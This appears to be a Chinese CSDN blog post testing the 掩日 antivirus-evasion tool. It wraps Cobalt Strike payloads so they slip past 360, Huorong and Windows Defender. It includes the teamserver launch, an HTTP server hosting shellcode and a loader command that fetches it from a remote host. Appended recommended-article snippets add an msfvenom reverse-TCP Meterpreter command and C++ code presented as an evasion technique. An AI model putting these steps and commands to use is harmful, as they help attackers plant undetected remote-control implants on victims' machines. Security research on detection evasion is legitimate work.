【新版】掩日免杀windows Defender

最新推荐文章于 2025-06-03 14:40:47 发布
原创 最新推荐文章于 2025-06-03 14:40:47 发布 · 7.4k 阅读 · 57 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#乌鸦安全 #免杀 #掩日 #Bypass

更新时间:2022.05.16
image.png

本文首发乌鸦安全知识星球

1. 介绍

掩日免杀是一个非常优秀的项目,目前在4月19号已经更新,更新的变动较大,支持的种类更多,在这里再试试现在的效果如何:
https://github.com/1y0n/av_evasion_tool/

image.png

下载之后本地打开:(记得关闭杀软)

image.png

2. 环境配置

安装环境:Windows10虚拟机
在这里新版本掩日采用了gcc环境和go环境,在作者的项目介绍中,对其都有要求,我们按照要求分别安装gccgo的环境:

gcc安装

gcc --version
image.png

go安装

go version
image.png

3. 环境

在作者的介绍中,针对Cobalt Strike生成的木马要求:
针对Cobalt Strike,不要选择生成Windows分阶段木马、Windows无阶段木马,而是生成payload,最终是一个payload.c文件。
因此在这里我们使用最常用的CS的木马来进行操作。

3.1 环境准备

在本地启动一个CS,服务端:
sudo ./teamserver 10.30.1.147 123
image.png
启用客户端,并新增监听,在这里使用作者建议的HTTPS方式:
image.png

然后生成一个payload.c文件:

image.png

3.2 测试环境

测试机:

  • Windows10 360主动防御
  • Windows7 火绒主动防御
  • Windows10 开启windows Defender

其中测试的杀软均升级到最新,并且关闭了自动上传样本的功能。

4. 免杀测试

4.1 通用免杀

在这里选择直接执行的方式,并且使用隐藏窗口的模式:
image.png

此时生成成功:

image.png

4.1.1 火绒(成功)

image.png
此时没有发现问题,上线测试:
image.png

4.1.2 360(成功)

关闭360的自动上传样本功能:
image.png

然后按位置扫描,没有发现问题:

image.png

上线测试下,此时上线正常:
image.png

4.1.3 Windows Defender(失败)

此时的 Windows Defender病毒库为最新版本:

image.png

静态测试

image.png

动态上线(被杀)

在上线之后,立刻被拦截查杀:
image.png

在这里可以发现,三个杀软中只有Windows Defender难过,因此针对它进一步进行测试:
在这里选择了加密方法,然后再去生成木马,但是发现过Windows Defender的时候,依旧被杀。
image.png

4.1.4 强力模式(成功)

在这里选择强力模式,作者对于强力模式的解释是拥有很好的免杀和反沙盒效果,但是耗时比较长,而且会消耗大量的CPU

image.png
image.png

此时静态查杀,依旧正常

image.png
动态上线正常:
image.png

4.2 分离免杀

在这里执行的时候,会生成两个文件,一个是不含shellcodeshellcode加载器,另外就是一个shellcode文件(可能经过了各种加密变形)。

image.png

此时生成了两个文件:
image.png
静态查杀正常:

image.png

动态加载:
动态加载的话,不是直接双击上线的,而是在命令行中,将exe加载,并且跟上分离文件的名称才可以:(此时没有杀软)

image.png

当有Windows Defender的时候:
image.png
直接被动态查杀,再试试其他的方式,发现全部被杀
image.png

4.3 网络分离

image.png
将生成的shellcode加载器放到目标机器上,并在目标机能访问到的机器上开启一个http服务:
python3 -m http.server 802
image.png
然后在远程进行加载:
dUu.exe http://10.30.1.147:802/dUu.txt
image.png
还是被Windows Defender杀了:

image.png

5. 总结

在整个掩日免杀项目中,可以看到功能比以前增加了很多,而且体验感变好,免杀能力也很强。
当然Windows Defender依旧是很难对抗的,很多情况下还是要看对方的环境是啥,不要一味地追求Bypass everyone

【2025版】最新的一种简易的绕过方法,从零基础到精通,收藏这篇就够了!
leah126的博客
02-13 1063
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。这也是耗费了大白近四个月的时间,吐血整理,文章非常非常长,觉得有用的话,希望粉丝朋友帮忙点个**「分享」对于从来没有接触过黑客/网络安全的同学,目前网络安全、信息安全也是计算机大学生毕业薪资相对较高的学科。觉得有用的话,希望粉丝朋友帮大白点个**「分享」木马问题与防御********必知必会。
Windows defender bypass
jijisaq的博客
06-14 1326
在制作的过程中,翻找 Windows 官方对 Windows Defender 的介绍,发现有这样一个目录:Configure Microsoft Defender Antivirus exclusions on Windows Server(在 Windows server 中配置defender排除项)。简而言之就是在 Windows Server2016 和 2019 中,Windows Defender 默认存在一些排除项,在实时检测过程中会忽略这些排除项,但是主动扫描的时候不会排除。
spacesniffer、WizTree等空间分析软件右键卡死?网盘惹的祸!
最新发布
binweisili的博客
06-03 464
用户反映使用SpaceSniffer和WizTree清理磁盘时出现右键卡死问题,经查发现是百度/天翼网盘右键菜单导致。解决方案为卸载网盘并利用"火绒右键管理"工具清除残留菜单项。该工具也可选择性删除特定网盘的右键菜单。问题解决后两款软件均恢复正常,作者还特别称赞了WizTree的高速扫描性能。
TryHackMe-Set(Windows渗透测试 | WinDefender
M1n9K1n9的博客
04-18 954
您再次发现自己在Windcorp公司的内部网络上。上次你去那里的味道真好,你回来了 了解更多。但是,这次他们设法保护了域控制器,因此您需要找到另一台服务器,并在第一次扫描时发现“Set”。Set被用作开发人员的平台,最近遇到了一些问题。他们不得不重置很多用户并恢复备份(也许您不是他们网络上唯一的黑客?因此,他们决定确保所有用户都使用正确的密码并关闭一些松散的策略。你还能找到进去的路吗?某些用户是否比其他用户更有特权?还是更草率的?也许您需要跳出框框思考一下,以规避他们的新安全控制…
笔记
crowsec
06-01 4938
微信公众号:乌鸦安全 扫取二维码获取更多信息! 1. 环境 攻击机: kali linux 10.211.55.23 受害机: Windows10 360主动防御 Windows7 火绒主动防御 2. 生成exe文件 在kali linux下使用msfvenom生成一个64位的exe文件 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.211.55.23 lport=4444 -f exe ...
- 执行器生成工具 使用指南
gitblog_00851的博客
08-09 1025
- 执行器生成工具 使用指南 AV_Evasion_Tool - 执行器生成工具项目地址:https://gitcode.com/gh_mirrors/ave/AV_Evasion_Tool 项目介绍 是一款强大的执行器生成工具,由开发者 1y0n 在 GitHub 上维护。该工具设计用于避开常见的安全软件检测,通过一系列技术手段使生成的执行文件能够绕过大多数防病毒软件...
:红队行动中的综合利器
gitblog_00068的博客
06-07 761
:红队行动中的综合利器 AV_Evasion_Tool - 执行器生成工具项目地址:https://gitcode.com/gh_mirrors/ave/AV_Evasion_Tool 在网络安全的世界里,对抗是永不停息的主题。当红队执行任务时,如何确保渗透工具逃避毒软件的监控,成为了至关重要的一环。这就是——一个专为红队设计的综合工具,它的存在就是为了提供强大的隐蔽...
WEB渗透篇-工具全集
qq_59468567的博客
08-19 2930
重写版Gh0st远控、大灰狼远控,目前可360、火绒、腾讯电脑管家等主流软。
红队培训班作业 | 过360和火绒 四种方法大对比
Ms08067安全实验室
08-16 3176
文章来源|MS08067 红队培训班第12节课作业本文作者:汤浩荡(红队培训班1期学员)按老师要求尝试完成布置的作业如下:环境准备:Kali linux安装cs4.2,Windows7系统...
Cobal Strike过360
qq_44905657的博客
12-27 3407
Cobal Strike生成shellcode
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 6204
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
2018最新
02-26
这是一款壳,2018年2月18亲测,如不请配合别的手法进行更好的效果。壳只是暂时的,做好去学习一下myccl定位特征码
手法 笔记 技巧
07-15
手法 笔记 技巧手法 笔记 技巧手法 笔记 技巧手法 笔记 技巧手法 笔记 技巧手法 笔记 技巧手法 笔记 技巧手法 笔记 技巧
神器thefatrat
01-06
linux下使用(用linux下太慢了!!!)教程请自行百度
新版——搭配CS使用测试
ZxC789456302的博客
10-05 2126
使用工具: 环境需求: 64位 Windows 7 或以上操作系统 .net framework 4.5 或更高
FourEye
战神/calmness的博客
12-25 1035
生成木马 root@kali:~/桌面# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.28.130 LPORT=444 -f raw -o shellcode.raw msf5 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf5 exploit(multi/handler) > se..
:打造你的隐形战士 - 红队专属工具深度探索
gitblog_00613的博客
08-09 1013
:打造你的隐形战士 - 红队专属工具深度探索 AV_Evasion_Tool - 执行器生成工具项目地址:https://gitcode.com/gh_mirrors/ave/AV_Evasion_Tool 在这个信息安全益重要的时代,红蓝对抗已成为检验网络安全防护能力的重要方式。而其中的工具,则像是红队手中的隐形斗篷,让攻击行动更加隐秘,难以被发现。今天,我们来深入探讨一...
老树开新花之shellcode_launcherWindows Defender
crowsec
01-17 2685
微信公众号:乌鸦安全 扫取二维码获取更多信息! 效果 静态 动态效果(指的是可执行命令) 1. 准备条件 本文中的方式在我写完文章之后,基本已经失效,毕竟是见光死,所以仅供各位师傅参考,内容上如有错误,希望师傅们能够指正! 本文在测试时,发现可新版火绒、最新版联网360、Windows Defender新版(关闭可疑文件上传)。 本文工具已打包至我的GitHub,欢迎多多star: https://github.com/crow82.
c++ 调用c++dll_C格式shellcode异或加密生成dll 可过Windows Defender
weixin_34093753的博客
01-26 837
C格式shellcode异或加密生成dll 可过Windows Defender1简介项目地址:https://github.com/k-fire/shellcode-To-DLL测试环境: winserver2016 cs 4.0编译环境: win10 VS20192原理C格式shellcode异或加密写入dll文件当dll被调用或者被注入进其他进程时触发功能dll功能:解...
教程
04-02
### 技术概述 是一种高级的反病毒技术,主要通过修改恶意程序的特征码来规避毒软件的静态和动态分析机制。这种技术的核心在于理解并绕过毒软件的检测逻辑[^1]。 #### 技术原理 通常依赖以下几个关键技术点: 1. **特征码混淆** 特征码是毒软件用于识别已知威胁的主要依据。通过对二进制代码进行加密、压缩或重新排列等方式,可以有效改变原有特征码,从而使毒软件无法匹配到已有的签名数据库。 2. **加壳与脱壳处理** 使用加壳工具对可执行文件进行保护,增加一层或多层封装,使得原始代码难以被直接解析。常见的加壳工具有UPX、PECompact等。然而需要注意的是,某些先进的毒引擎能够识别这些通用壳的存在,因此可能需要自定义开发专用壳。 3. **虚拟化环境检测规避** 许多现代毒产品会在沙盒环境中运行可疑样本以观察行为模式。为了防止此类检测,可以通过编写特定条件判断语句(如检查是否存在调试器、是否处于虚拟机状态),让恶意代码仅在真实目标环境下激活[^2]。 4. **API调用隐藏** 将敏感函数替换为间接调用形式或者利用反射加载DLL中的导出项,减少直接暴露危险操作的可能性。这种方法增加了逆向工程难度,同时也降低了触发启发式规则的概率。 #### 实现方法指导 以下是基于上述理论的一种简化版实践路径说明: ```c++ #include <windows.h> #include <iostream> int main() { // 示例:简单演示如何通过更改字符串常量位置避开固定特征扫描 char* command = reinterpret_cast<char*>(VirtualAlloc(NULL, sizeof("calc"), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)); memcpy(command, "calc", strlen("calc")); HANDLE hToken; TOKEN_PRIVILEGES tkp; OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken); LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid); tkp.PrivilegeCount = 1; tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL, NULL); CreateRemoteThread(OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId()), NULL, 0, (LPTHREAD_START_ROUTINE)GetProcAddress(LoadLibraryA("kernel32.dll"), "WinExec"), command, 0, NULL); VirtualFree(command, 0, MEM_RELEASE); } ``` 此代码片段展示了基本概念验证过程的一部分——即如何动态分配内存存储命令参数而非硬编码于源文件之中,以此降低因明文出现而导致轻易被捕获的风险。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值